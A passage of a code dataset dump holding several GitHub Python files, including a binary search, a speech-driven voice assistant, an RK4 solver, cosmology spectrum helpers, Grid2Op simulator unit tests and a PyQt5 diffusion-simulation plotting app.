count['D'] and count['L'] == count['R']:\n return True\n return False\n","repo_name":"ChrisYoungGH/LeetCode","sub_path":"657.JudgeRouteCircle/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39366824023","text":"def binary_search(list, target):\n \"\"\"\n \"\"\"\n first = 0\n last = len(list) - 1\n while first <= last:\n midpoint = (first + last) // 2\n\n if(list[midpoint] == target):\n return midpoint\n elif list[midpoint] < target:\n first = midpoint + 1\n else:\n last = midpoint - 1\n return None\n\n\nif __name__ == \"__main__\":\n number_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]\n index = binary_search(number_list, 1)\n print(\"INDEX=\", index, \"TARGET=\", number_list[index])\n","repo_name":"GoodnessEzeokafor/treehouse-algorithm","sub_path":"binary_search_first_version.py","file_name":"binary_search_first_version.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40013378785","text":"\nimport pyttsx3 \nimport datetime\nimport speech_recognition as sr\nimport webbrowser as wb\n\nbot = pyttsx3.init()\nvoice = bot.getProperty('voices')\nbot.setProperty('voices',voice[1].id)\n\ndef speak(audio):\n print('bot : '+ audio)\n bot.say(audio)\n bot.runAndWait()\n\ndef time():\n Time = datetime.datetime.now().strftime(\"%I: %M: %p\")\n speak(Time)\ndef welcome():\n hour = datetime.datetime.now().hour\n if hour >= 6 and hour <12 :\n speak(\"Good Morning Joycee\")\n elif hour >= 12 and hour <18 :\n speak(\"Good Afternoon Joycee\")\n elif hour >= 18 and hour <24 :\n speak(\"Good Night Joycee\")\n speak ('How can i help you')\ndef command():\n c=sr.Recognizer()\n with sr.Microphone() as source:\n c.pause_threshold = 2\n audio = c.listen(source)\n try :\n query = c.recognize_google(audio,language='en')\n print(\"Joycee :\"+ query)\n except sr.UnknownValueError:\n print(\"Please repeat or typing the command \")\n query = str(input('Your order is: '))\n return query\nif __name__ == \"__main__\":\n welcome()\n while True :\n query = command().lower()\n if \"google\" in query:\n speak(\"what should I search boss?\")\n search = command().lower()\n url = f\"https://www.google.com/search?q={search}\"\n wb.get().open(url)\n speak(f'Here is your {search} on google') \n if \"youtobe\" in query:\n speak(\"what should I search boss?\")\n search = command().lower()\n url = f\"https://www.youtube.com/search?q={search}\"\n wb.get().open(url)\n speak(f'Here is your {search} on google') \n elif \"time\" in query:\n time()\n elif \"quit\" in query:\n speak(\"I am quitting .Goodbye boss\")\n quit()","repo_name":"Joyce-78/tr-l-o-","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36685138623","text":"import decimal\nimport math\n\n\ndef f(X, Y):\n return decimal.Decimal((-X * Y) / (X * X - 9))\n\n\ndef Y(X):\n return decimal.Decimal(4 / (math.sqrt(X * X - 9)))\n\n\nh = decimal.Decimal('0.05')\nx = []\ny = []\nx.append(decimal.Decimal('5.00'))\ny.append(decimal.Decimal('1.00'))\n\n\nfor i in range(0, 21):\n\n if i >= 1:\n k1 = f(x[i - 1], y[i - 1])\n k2 = f(x[i - 1] + h / 2, y[i - 1] + h * k1 / 2)\n k3 = f(x[i - 1] + h / 2, y[i - 1] + h * k2 / 2)\n k4 = f(x[i - 1] + h, y[i - 1] + h * k3)\n\n x.append(x[i - 1] + h)\n y.append(y[i - 1] + h * (k1 
+ 2 * k2 + 2 * k3 + k4) / 6)\n\n print(\"x{} =\".format(i), x[i], \" RK4 y{} =\".format(i), \"%.10f\" % y[i], end=\"\")\n print(\" 참값 y{} =\".format(i), \"%.10f\" % Y(x[i]), end=\"\")\n print(\" 절대오차 {} =\".format(i), \"%.10f\" % abs(y[i] - Y(x[i])), end=\"\")\n print(\" 상대오차 {} =\".format(i), \"%.10f\" % (abs(y[i] - Y(x[i])) * 100 / abs(Y(x[i]))), end=\"\")\n print(\"%\")\n \n","repo_name":"mintway0341/RK4","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22090250510","text":"from scipy.interpolate import splrep,splev\nimport numpy as np\n\nimport re\nfrom orphics.tools.io import bcolors, Plotter\nimport sys\nfrom math import pi\n\n\ndef loadBinFile(binfile,delimiter='\\t',returnBinner=True):\n\n mat = np.loadtxt(binfile,delimiter=delimiter)\n\n left = mat[:,0]\n right = mat[:,1]\n try:\n center = mat[:,2]\n except:\n print(\"coreStats.py:loadBinFile says \\\"Third column absent in binfile. Using mean of left and right edges.\\\"\")\n center = (left+right)/2.\n\n if returnBinner:\n bin_edges = left.copy()\n bin_edges = np.append(bin_edges,right[-1])\n return coreBinner(bin_edges)\n else:\n return left,right,center\n\nclass smartCls:\n\n def __init__(self,filename,ellrange=None,verbose=False):#colnum=-1,ellrange=None,norm=\"none\",transpower=[0.,1.]):\n\n self.verbose = verbose\n #Do an initial pass through the file\n leng = -1\n maybe_ells = []\n self._fname = filename\n i=0\n with open(filename,'rb') as f:\n for line in f:\n\n row = line.split()\n assert(len(row)==leng or leng==-1), \"ERROR: Not a column file.\"\n leng = len(row)\n if leng>1: maybe_ells.append(float(row[0]))\n i+=1\n #print leng\n #print i\n\n if not(ellrange==None):\n self.ells = ellrange\n \n elif leng>1. and min(maybe_ells)>1. and max(maybe_ells)<20000.:\n self.ells = maybe_ells\n if self.verbose: print(\"Found an ell column. Using it.\")\n else:\n self.ells = np.arange(2.,i+2.,1.)\n print(\"Warning: no ell column detected. Assuming ell range is 2 to ~number of rows.\") \n #print \"First column is ells\"\n\n #if colnum>-1: return self.getCol(colnum,norm=norm,transpower=[0.,1.])\n \n def getCol(self,colnum=0,norm=\"none\",transpower=[0.,1.]):\n\n col=[]\n i=0\n with open(self._fname,'rb') as f:\n for line in f:\n row = line.split()\n l = self.ells[i]\n \n if norm==\"none\":\n m = 1.\n elif norm==\"lsq\":\n m = l*(l+1.)/2./pi\n \n else:\n print(\"ERROR: unrecognized norm factor\")\n sys.exit(1)\n\n\n p = transpower[1]*(l**(transpower[0])) \n #print m\n #print row\n #print colnum\n #print row[colnum]\n col.append(float(row[colnum])*p/m)\n\n i+=1\n \n #print i\n return col\n \n\ndef validateMapType(mapXYType):\n assert not(re.search('[^TEB]', mapXYType)) and (len(mapXYType)==2), \\\n bcolors.FAIL+\"\\\"\"+mapXYType+\"\\\" is an invalid map type. XY must be a two\" + \\\n \" letter combination of T, E and B. 
e.g TT or TE.\"+bcolors.ENDC\n\n\n\ndef makeTemplate(l,Fl,mod,Nx,Ny,debug=False):\n \"\"\"\n Given 1d function Fl of l, creates the 2d version\n of Fl on 2d k-space defined by mod\n \"\"\"\n\n FlSpline = splrep(l,Fl,k=3) \n ll = np.ravel(mod)\n kk = (splev(ll,FlSpline))\n\n\n template = np.reshape(kk,[Ny,Nx])\n\n \n if debug:\n print(kk)\n myFig = Plotter(\"$l$\",\"$F_l$\",scaleX=\"log\",scaleY=\"log\")\n #myFig.add(l,Fl)\n myFig.add(ll,kk)\n myFig.done(fileName=\"output/interp.png\")\n plotme([mod],saveFile=\"output/mod.png\",axoff=True,clbar=False)\n plotme([template],saveFile=\"output/temp.png\",axoff=True,clbar=False)\n plotme([np.log(template)],saveFile=\"output/logtemp.png\",axoff=True,clbar=False)\n sys.exit()\n \n\n return template\n\ndef loadCls(fileName, colnum, lpad, lmax, factorout=\"none\"):\n '''\n WARNING: For autospectra, CAMB returns negative values beyond a certain ell, which is unphysical,\n so make sure your lpad is set to be less than that ell. Always examine your CAMB output.\n \n Load Cls from a CAMB-output file from column number colnum (>0, zero is assumed to hold ells)\n \n Pad with zeros after lpad\n Return lists that go up to lmax (possibly padded with zeros after lpad)\n factorout options\n 1. none, get Cls as they are\n 2. ll1, divide by l(l+1)/2pi\n 3. ll1sq, divide by (l(l+1)^2/2pi\n 4. ll13o2, divide by (l(l+1))^(3/2)/2pi\n 5. l4, divide by l^4\n 6. l3, divide by l^3\n Return list of ells and list of Cls\n '''\n\n\n uCell=[]\n ell=[]\n\n lFi=open(fileName,'r')\n for line in lFi:\n\n columns = line.split()\n if (float(columns[0])>=lpad):\n break\n ell.append(float(columns[0]))\n uCell.append(float(columns[colnum]))\n\n\n\n ell=np.array(ell)\n\n\n if factorout==\"none\":\n uCellR=np.array(uCell)\n elif factorout==\"ll1\":\n uCellR=np.array([c*2.*pi/l/(l+1.) for c,l in zip(uCell,ell)])\n elif factorout==\"ll1sq\":\n uCellR=np.array([c*2.*pi/l/l/(l+1.)/(l+1.) for c,l in zip(uCell,ell)])\n elif factorout==\"ll13o2\":\n uCellR=np.array([c*2.*pi/((l/(l+1.))**(3./2.)) for c,l in zip(uCell,ell)])\n elif factorout==\"l4\":\n uCellR=np.array([c*2./(l**4.) for c,l in zip(uCell,ell)])\n elif factorout==\"l3\":\n uCellR=np.array([c*2./(l**3.) 
for c,l in zip(uCell,ell)])\n else:\n print((bcolors.FAIL+\"ERROR: Unrecognized argument \", factorout,\" for factorout.\"+bcolors.ENDC))\n sys.exit()\n\n\n\n lFi.close()\n\n k=int(ell.max())\n apell = list(range(k+1,lmax))\n lastval = uCellR[-1]\n\n\n apucl = np.array([lastval]*len(apell))\n ell = np.append(ell,apell)\n uCellR = np.append(uCellR,apucl)\n \n \n\n\n return (ell), (uCellR)\n\n\n\nclass coreBinner:\n '''\n * Takes data defined on x0 and produces values binned on x.\n * Assumes x0 is linearly spaced and continuous in a domain?\n * Assumes x is continuous in a subdomain of x0.\n * Should handle NaNs correctly.\n '''\n \n\n def __init__(self, bin_edges):\n\n self.updateBinEdges(bin_edges)\n\n\n def updateBinEdges(self,bin_edges):\n \n self.bin_edges = bin_edges\n self.numbins = len(bin_edges)-1\n\n\n def binned(self,x,y):\n\n\n # pretty sure this treats nans in y correctly, but should double-check!\n bin_means = binnedstat(x,y,bins=self.bin_edges,statistic=np.nanmean)[0]\n\n\n \n return bin_means\n\n \n\n def getBinCenters(self,mode=\"mean\"):\n\n if mode==\"mean\":\n return (self.bin_edges[:-1]+self.bin_edges[1:])/2.\n else:\n raise ValueError\n\n\ndef loadBinFile(binfile,delimiter='\\t',returnBinner=True):\n\n mat = np.loadtxt(binfile,delimiter=delimiter)\n\n left = mat[:,0]\n right = mat[:,1]\n try:\n center = mat[:,2]\n except:\n print(\"coreStats.py:loadBinFile says \\\"Third column absent in binfile. Using mean of left and right edges.\\\"\")\n center = (left+right)/2.\n\n if returnBinner:\n bin_edges = left.copy()\n bin_edges = np.append(bin_edges,right[-1])\n return coreBinner(bin_edges)\n else:\n return left,right,center\n","repo_name":"iej2106/dmb_analysis","sub_path":"fishchips/orphics/unmerged/tools/legacy.py","file_name":"legacy.py","file_ext":"py","file_size_in_byte":7106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"32444738388","text":"import unittest\nimport warnings\nimport grid2op\nimport numpy as np\nfrom grid2op.Action import PlayableAction\n\nfrom grid2op.simulator import Simulator\nfrom grid2op.Exceptions import SimulatorError, BaseObservationError\n\nimport pdb\n\n\nclass TestSimulator(unittest.TestCase):\n def setUp(self) -> None:\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\")\n self.env = grid2op.make(\"l2rpn_case14_sandbox\",\n test=True,\n _add_to_name=type(self).__name__)\n self.env.seed(0)\n self.obs = self.env.reset()\n\n def tearDown(self) -> None:\n self.env.close()\n\n def test_create(self):\n \"\"\"test i can create them\"\"\"\n simulator = Simulator(backend=self.env.backend)\n assert simulator.backend is not self.env.backend\n\n simulator = Simulator(backend=None, env=self.env)\n assert simulator.backend is not self.env.backend\n\n with self.assertRaises(SimulatorError):\n # backend should be a backend\n simulator = Simulator(backend=self.env)\n with self.assertRaises(SimulatorError):\n # backend is not None\n simulator = Simulator(backend=self.env.backend, env=self.env)\n with self.assertRaises(SimulatorError):\n # env is not a BaseEnv\n simulator = Simulator(backend=self.env.backend, env=self.env.backend)\n\n def test_change_backend(self):\n simulator = Simulator(backend=self.env.backend)\n with self.assertRaises(SimulatorError):\n # not initialized\n simulator.change_backend(self.env.backend.copy())\n\n simulator.set_state(self.obs)\n simulator.change_backend(self.env.backend.copy())\n\n with self.assertRaises(SimulatorError):\n # env is not a 
BaseEnv\n simulator.change_backend(self.env)\n\n def test_change_backend_type(self):\n simulator = Simulator(backend=self.env.backend)\n with self.assertRaises(SimulatorError):\n # not initialized\n simulator.change_backend_type(\n self.env.backend.copy(), grid_path=self.env._init_grid_path\n )\n\n simulator.set_state(self.obs)\n simulator.change_backend_type(\n self.env._raw_backend_class, grid_path=self.env._init_grid_path\n )\n\n with self.assertRaises(SimulatorError):\n # self.env.backend is not a type\n simulator.change_backend_type(\n self.env.backend, grid_path=self.env._init_grid_path\n )\n\n with self.assertRaises(SimulatorError):\n # wrong type\n simulator.change_backend_type(\n type(self.env), grid_path=self.env._init_grid_path\n )\n\n def test_predict(self):\n env = self.env\n simulator = Simulator(backend=self.env.backend)\n\n act1 = env.action_space({\"set_line_status\": [(1, -1)]})\n act2 = env.action_space(\n {\"set_bus\": {\"substations_id\": [(5, (2, 1, 2, 1, 2, 1, 2))]}}\n )\n\n with self.assertRaises(SimulatorError):\n # not initialized\n sim1 = simulator.predict(act1)\n\n simulator.set_state(self.obs)\n\n sim1 = simulator.predict(act1)\n assert sim1 is not simulator\n assert sim1.current_obs.rho[1] == 0.0\n\n sim2 = simulator.predict(act2)\n assert sim2 is not simulator\n assert abs(sim2.current_obs.rho[1] - 0.35845447) <= 1e-6\n\n sim3 = simulator.predict(act1).predict(act2, do_copy=False)\n assert abs(sim3.current_obs.rho[1]) <= 1e-6\n assert np.any(sim3.current_obs.rho != sim1.current_obs.rho)\n assert np.any(sim3.current_obs.rho != sim2.current_obs.rho)\n assert np.any(sim3.current_obs.rho != simulator.current_obs.rho)\n\n sim4 = simulator.predict(\n act1,\n new_gen_p=env.chronics_handler.real_data.data.prod_p[1],\n new_gen_v=env.chronics_handler.real_data.data.prod_v[1],\n new_load_p=env.chronics_handler.real_data.data.load_p[1],\n new_load_q=env.chronics_handler.real_data.data.load_q[1],\n )\n assert sim4 is not simulator\n assert sim4.current_obs.rho[1] == 0.0\n assert np.any(sim4.current_obs.rho != sim1.current_obs.rho)\n\n sim5 = sim1.predict(act2)\n assert abs(sim5.current_obs.rho[1]) <= 1e-6\n assert np.max(np.abs(sim5.current_obs.rho - sim3.current_obs.rho)) <= 1e-6\n\n sim6 = simulator.predict(act1, do_copy=False)\n assert sim6 is simulator\n assert abs(sim6.current_obs.rho[1]) <= 1e-6\n assert np.max(np.abs(sim6.current_obs.rho - sim1.current_obs.rho)) <= 1e-6\n\n def test_copy(self):\n simulator = Simulator(backend=self.env.backend)\n with self.assertRaises(SimulatorError):\n # not initialized\n sim1 = simulator.copy()\n\n simulator.set_state(self.obs)\n sim1 = simulator.copy()\n assert sim1 is not simulator\n assert np.max(np.abs(sim1.current_obs.rho - simulator.current_obs.rho)) <= 1e-6\n\n def test_obs(self):\n simulator = self.obs.get_simulator()\n assert np.max(np.abs(simulator.current_obs.rho - self.obs.rho)) <= 1e-6\n\n with self.assertRaises(BaseObservationError):\n sim2 = simulator.current_obs.get_simulator()\n\n\nclass TestComplexActions(unittest.TestCase):\n def setUp(self) -> None:\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\")\n self.env = grid2op.make(\n \"educ_case14_storage\", test=True, action_class=PlayableAction,\n _add_to_name=type(self).__name__\n )\n self.env.seed(0)\n self.obs = self.env.reset()\n self.simulator = Simulator(backend=self.env.backend)\n self.simulator.set_state(self.obs)\n\n def tearDown(self) -> None:\n self.env.close()\n self.simulator.close()\n\n def test_redisp_action(self):\n act = 
self.env.action_space({\"redispatch\": [(0, 5.0)]})\n obs, *_ = self.env.step(act)\n res = self.simulator.predict(\n act,\n new_gen_p=obs.gen_p - obs.actual_dispatch,\n new_load_p=obs.load_p,\n new_load_q=obs.load_q,\n )\n assert (\n np.max(np.abs(res.current_obs.target_dispatch - obs.target_dispatch))\n <= 1e-5\n )\n assert (\n np.max(np.abs(res.current_obs.actual_dispatch - obs.actual_dispatch))\n <= 1e-2\n )\n assert np.max(np.abs(res.current_obs.gen_p - obs.gen_p)) <= 1e-2\n\n act2 = self.env.action_space({\"redispatch\": [(0, 5.0), (1, 4.0)]})\n obs2, *_ = self.env.step(act2)\n res2 = res.predict(\n act2,\n new_gen_p=obs2.gen_p - obs.actual_dispatch,\n new_load_p=obs2.load_p,\n new_load_q=obs2.load_q,\n )\n assert (\n np.max(np.abs(res2.current_obs.target_dispatch - obs2.target_dispatch))\n <= 1e-2\n )\n # ultimately the redispatch should match (but not necessarily at this step)\n for _ in range(2):\n obsn, *_ = self.env.step(self.env.action_space())\n assert (\n np.max(np.abs(res2.current_obs.actual_dispatch - obsn.actual_dispatch))\n <= 2e-1\n )\n\n act3 = self.env.action_space({\"redispatch\": [(5, 3.0)]})\n obs3, *_ = self.env.step(act3)\n res3 = res2.predict(\n act3,\n new_gen_p=obs3.gen_p - obs3.actual_dispatch,\n new_load_p=obs3.load_p,\n new_load_q=obs3.load_q,\n )\n\n assert (\n np.max(np.abs(res3.current_obs.target_dispatch - obs3.target_dispatch))\n <= 2e-1\n )\n assert (\n np.max(np.abs(res3.current_obs.actual_dispatch - obs3.actual_dispatch))\n <= 4e-1\n )\n assert np.max(np.abs(res3.current_obs.gen_p - obs3.gen_p)) <= 4e-1\n\n def test_storage(self):\n act = self.env.action_space({\"set_storage\": [(0, -5.0)]})\n obs, *_ = self.env.step(act)\n res = self.simulator.predict(\n act,\n new_gen_p=obs.gen_p - obs.actual_dispatch,\n new_load_p=obs.load_p,\n new_load_q=obs.load_q,\n )\n assert (\n np.max(np.abs(res.current_obs.actual_dispatch - obs.actual_dispatch)) <= 0.1\n )\n assert np.max(np.abs(res.current_obs.gen_p - obs.gen_p)) <= 0.1\n assert np.max(np.abs(res.current_obs.storage_power - obs.storage_power)) <= 0.1\n assert (\n np.max(np.abs(res.current_obs.storage_charge - obs.storage_charge)) <= 0.1\n )\n\n # check Emin / Emax are met\n for it_num in range(16):\n res.predict(act, do_copy=False)\n assert res.converged, f\"error at iteration {it_num}\"\n assert np.all(res.current_obs.storage_power == [-5.0, 0.0])\n res.predict(act, do_copy=False)\n assert res.converged\n assert np.all(res.current_obs.storage_charge == [0.0, 3.5])\n assert np.all(np.abs(res.current_obs.storage_power - [-0.499, 0.0]) <= 0.01)\n res.predict(act, do_copy=False)\n assert res.converged\n assert np.all(res.current_obs.storage_charge == [0.0, 3.5])\n assert np.all(np.abs(res.current_obs.storage_power) <= 0.01)\n\n act2 = self.env.action_space({\"set_storage\": [(0, 5.0), (1, -10.0)]})\n res.predict(act2, do_copy=False)\n assert res.converged\n assert np.all(np.abs(res.current_obs.storage_charge - [0.417, 2.667]) <= 0.01)\n assert np.all(np.abs(res.current_obs.storage_power - [5.0, -10.0]) <= 0.01)\n\n def test_curtailment(self):\n gen_id = 2\n # should curtail 3.4 MW\n act = self.env.action_space()\n act.curtail_mw = [(gen_id, 5.0)]\n obs, *_ = self.env.step(act)\n new_gen_p = obs.gen_p - obs.actual_dispatch\n new_gen_p[gen_id] = obs.gen_p_before_curtail[gen_id]\n res = self.simulator.predict(\n act, new_gen_p=new_gen_p, new_load_p=obs.load_p, new_load_q=obs.load_q\n )\n assert (\n np.max(np.abs(res.current_obs.target_dispatch - obs.target_dispatch))\n <= 1e-5\n )\n assert (\n 
np.max(np.abs(res.current_obs.actual_dispatch - obs.actual_dispatch)) <= 0.1\n )\n assert np.max(np.abs(res.current_obs.gen_p - obs.gen_p)) <= 0.1\n\n # should curtail another 3 MW\n act2 = self.env.action_space()\n act2.curtail_mw = [(gen_id, 2.0)]\n obs1, *_ = self.env.step(act2)\n new_gen_p2 = obs1.gen_p - obs1.actual_dispatch\n new_gen_p2[gen_id] = obs1.gen_p_before_curtail[gen_id]\n res2 = self.simulator.predict(\n act2, new_gen_p=new_gen_p2, new_load_p=obs1.load_p, new_load_q=obs1.load_q\n )\n assert (\n np.max(np.abs(res2.current_obs.target_dispatch - obs1.target_dispatch))\n <= 1e-5\n )\n assert (\n np.max(np.abs(res2.current_obs.actual_dispatch - obs1.actual_dispatch))\n <= 0.01\n )\n assert np.max(np.abs(res2.current_obs.gen_p - obs1.gen_p)) <= 0.01\n\n # should curtail less (-4 MW)\n act3 = self.env.action_space()\n act3.curtail_mw = [(gen_id, 6.0)]\n obs2, *_ = self.env.step(act3)\n new_gen_p3 = obs2.gen_p - obs2.actual_dispatch\n new_gen_p3[gen_id] = obs2.gen_p_before_curtail[gen_id]\n res3 = self.simulator.predict(\n act3, new_gen_p=new_gen_p3, new_load_p=obs2.load_p, new_load_q=obs2.load_q\n )\n assert (\n np.max(np.abs(res3.current_obs.target_dispatch - obs2.target_dispatch))\n <= 1e-5\n )\n assert (\n np.max(np.abs(res3.current_obs.actual_dispatch - obs2.actual_dispatch))\n <= 0.2\n )\n assert np.max(np.abs(res3.current_obs.gen_p - obs2.gen_p)) <= 0.2\n\n # remove all curtailment\n act4 = self.env.action_space()\n act4.curtail_mw = [(gen_id, 9.0)]\n obs3, *_ = self.env.step(act4)\n new_gen_p4 = obs3.gen_p - obs3.actual_dispatch\n new_gen_p4[gen_id] = obs3.gen_p_before_curtail[gen_id]\n res4 = self.simulator.predict(\n act4, new_gen_p=new_gen_p4, new_load_p=obs3.load_p, new_load_q=obs3.load_q\n )\n assert np.max(np.abs(res4.current_obs.actual_dispatch)) <= 1e-5\n assert (\n np.max(np.abs(res4.current_obs.target_dispatch - obs3.target_dispatch))\n <= 1e-5\n )\n assert (\n np.max(np.abs(res4.current_obs.actual_dispatch - obs3.actual_dispatch))\n <= 0.2\n )\n assert np.max(np.abs(res4.current_obs.gen_p - obs3.gen_p)) <= 0.2\n\n # now test when I start from a previous step with curtailment already\n res5 = res3.predict(\n act4, new_gen_p=new_gen_p4, new_load_p=obs3.load_p, new_load_q=obs3.load_q\n )\n assert np.max(np.abs(res5.current_obs.actual_dispatch)) <= 1e-5\n assert (\n np.max(\n np.abs(\n res5.current_obs.target_dispatch - res4.current_obs.target_dispatch\n )\n )\n <= 0.01\n )\n assert (\n np.max(\n np.abs(\n res5.current_obs.actual_dispatch - res4.current_obs.actual_dispatch\n )\n )\n <= 0.01\n )\n assert np.max(np.abs(res5.current_obs.gen_p - res4.current_obs.gen_p)) <= 0.01\n\n # now another test where i still apply some curtailment\n res6 = res2.predict(\n act3, new_gen_p=new_gen_p3, new_load_p=obs2.load_p, new_load_q=obs2.load_q\n )\n assert (\n np.max(\n np.abs(\n res6.current_obs.target_dispatch - res3.current_obs.target_dispatch\n )\n )\n <= 0.01\n )\n assert (\n np.max(\n np.abs(\n res6.current_obs.actual_dispatch - res3.current_obs.actual_dispatch\n )\n )\n <= 0.01\n )\n assert np.max(np.abs(res6.current_obs.gen_p - res3.current_obs.gen_p)) <= 0.01\n\n # TODO test observation attributes:\n # res.current_obs.curtailment[:] = (new_gen_p - new_gen_p_modif) / act.gen_pmax\n # res.current_obs.curtailment_limit[:] = act.curtail\n # res.current_obs.curtailment_limit_effective[:] = act.curtail\n # res.current_obs.gen_p_before_curtail[:] = new_gen_p\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","repo_name":"rte-france/Grid2Op","sub_path":"grid2op/tests/test_simulator.py","file_name":"test_simulator.py","file_ext":"py","file_size_in_byte":14645,"program_lang":"python","lang":"en","doc_type":"code","stars":240,"dataset":"github-code","pt":"16"} +{"seq_id":"33771346859","text":"import sys\nimport seaborn as sb\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QPushButton, QWidget, QAction, QTabWidget, QVBoxLayout, QLabel\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import pyqtSlot\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nimport matplotlib.pyplot as plt\nfrom Model.GraficaComparasion import DiffusionTrendComparison\nfrom ProfileTreshold import *\nfrom Profile import *\nfrom Threshold import *\nfrom MakeGrap import *\n\n\nclass App(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.title = 'SIMULACIÓN'\n self.left = 0\n self.top = 0\n self.width = 1300\n self.height = 1200\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.table_widget = MyTableWidget(self)\n self.setCentralWidget(self.table_widget)\n self.setStyleSheet(\"color: blue;\"\n \"background-color: gray;\"\n \"selection-color: yellow;\"\n \"selection-background-color: blue;\")\n self.show()\n\n\nclass MyTableWidget(QWidget):\n\n def loadTabs(self):\n self.tabs = QTabWidget()\n self.tab1 = QWidget()\n self.tab2 = QWidget()\n self.tab3 = QWidget()\n self.tab4 = QWidget()\n self.tab5 = QWidget()\n # self.tab6 = QWidget()\n self.tabs.resize(300, 200)\n\n # self.tabs.addTab(self.tabG1,\"Grafo Barabaási-Albert\")\n # self.tabs.addTab(self.tabG2, \"Grafo Erdos-Rényi\")\n # self.tabs.addTab(self.tabG3,\"Grafo Watts y Strogatz\")\n # self.tabs.addTab(self.tabG4,\"Grafo Facebook\")\n\n self.tabs.addTab(self.tab1, \"Simulacion\")\n self.tabs.addTab(self.tab2, \"Barabási–Albert\")\n self.tabs.addTab(self.tab3, \"Erdös–Rényi\")\n self.tabs.addTab(self.tab4, \"Watts y Strogatz\")\n self.tabs.addTab(self.tab5, \"Facebook\")\n # self.tabs.addTab(self.tab6,\"Mapa de calor\")\n\n self.tab1.layout = QVBoxLayout(self)\n self.pushButton1 = QPushButton(\"INICIAR SIMULACIÓN\")\n self.tab1.layout.addWidget(self.pushButton1)\n self.tab1.setLayout(self.tab1.layout)\n\n # Graficsa para Fig 1\n self.figure = plt.figure()\n self.canvas = FigureCanvas(self.figure)\n self.toolbar = NavigationToolbar(self.canvas, self)\n self.pushButton1.clicked.connect(self.graficas)\n self.tab2.layout = QVBoxLayout(self)\n self.tab2.layout.addWidget(self.toolbar)\n self.tab2.layout.addWidget(self.canvas)\n self.tab2.setLayout(self.tab2.layout)\n\n # Graficsa para Fig 2\n self.figure2 = plt.figure()\n self.canvas2 = FigureCanvas(self.figure2)\n self.toolbar2 = NavigationToolbar(self.canvas2, self)\n self.tab3.layout = QVBoxLayout(self)\n self.tab3.layout.addWidget(self.toolbar2)\n self.tab3.layout.addWidget(self.canvas2)\n self.tab3.setLayout(self.tab3.layout)\n\n # # Graficsa para Fig 3\n self.figure3 = plt.figure()\n self.canvas3 = FigureCanvas(self.figure3)\n self.toolbar3 = NavigationToolbar(self.canvas3, self)\n self.tab4.layout = QVBoxLayout(self)\n self.tab4.layout.addWidget(self.toolbar3)\n self.tab4.layout.addWidget(self.canvas3)\n self.tab4.setLayout(self.tab4.layout)\n\n # # Graficsa para Facebook\n self.figure4 = plt.figure()\n self.canvas4 = FigureCanvas(self.figure4)\n self.toolbar4 = NavigationToolbar(self.canvas4, self)\n 
self.tab5.layout = QVBoxLayout(self)\n self.tab5.layout.addWidget(self.toolbar4)\n self.tab5.layout.addWidget(self.canvas4)\n self.tab5.setLayout(self.tab5.layout)\n\n self.AddGraphs()\n self.layout.addWidget(self.tabs)\n self.setLayout(self.layout)\n\n def __init__(self, parent):\n super(QWidget, self).__init__(parent)\n self.layout = QVBoxLayout(self)\n self.loadTabs()\n\n @pyqtSlot()\n def on_click(self):\n print(\"\\n\")\n for currentQTableWidgetItem in self.tableWidget.selectedItems():\n print(currentQTableWidgetItem.row(),\n currentQTableWidgetItem.column(), currentQTableWidgetItem.text())\n\n # def plotGraphs(self):\n\n def AddGraphs(self):\n\n self.ax1 = self.figure.add_subplot(221)\n self.ax2 = self.figure.add_subplot(222)\n self.ax3 = self.figure.add_subplot(223)\n self.ax4 = self.figure.add_subplot(224)\n\n self.ax11 = self.figure2.add_subplot(221)\n self.ax12 = self.figure2.add_subplot(222)\n self.ax13 = self.figure2.add_subplot(223)\n self.ax14 = self.figure2.add_subplot(224)\n\n self.ax21 = self.figure3.add_subplot(321)\n self.ax22 = self.figure3.add_subplot(322)\n self.ax23 = self.figure3.add_subplot(323)\n self.ax24 = self.figure3.add_subplot(324)\n self.ax25 = self.figure3.add_subplot(325)\n self.ax26 = self.figure3.add_subplot(326)\n\n self.ax31 = self.figure4.add_subplot(321)\n self.ax32 = self.figure4.add_subplot(322)\n self.ax33 = self.figure4.add_subplot(323)\n self.ax34 = self.figure4.add_subplot(324)\n self.ax35 = self.figure4.add_subplot(325)\n self.ax36 = self.figure4.add_subplot(326)\n\n def graficas(self):\n print('Inicio de Simulación')\n\n g = make_graph(1)\n self.graficar(0.05, 0.1, 0.1, 0, 0, g, \"Fig 1 a).png\", self.ax1)\n self.graficar(0.05, 0.4, 0.1, 0, 0, g, \"Fig 1 b).png\", self.ax2)\n self.graficar(0.05, 0.8, 0.1, 0, 0, g, \"Fig 1 c).png\", self.ax3)\n self.graficar(0.05, 0.4, 0.2, 0, 0, g, \"Fig 1 d).png\", self.ax4)\n print('Graficas de Barabasi Alberth')\n\n g2 = make_graph(2)\n self.graficar(0.05, 0.1, 0.1, 0, 0, g2, \"Fig 2 a).png\", self.ax11)\n self.graficar(0.05, 0.4, 0.1, 0, 0, g2, \"Fig 2 b).png\", self.ax12)\n self.graficar(0.05, 0.8, 0.1, 0, 0, g2, \"Fig 2 c).png\", self.ax13)\n self.graficar(0.05, 0.4, 0.2, 0, 0, g2, \"Fig 2 d).png\", self.ax14)\n print('Graficas de 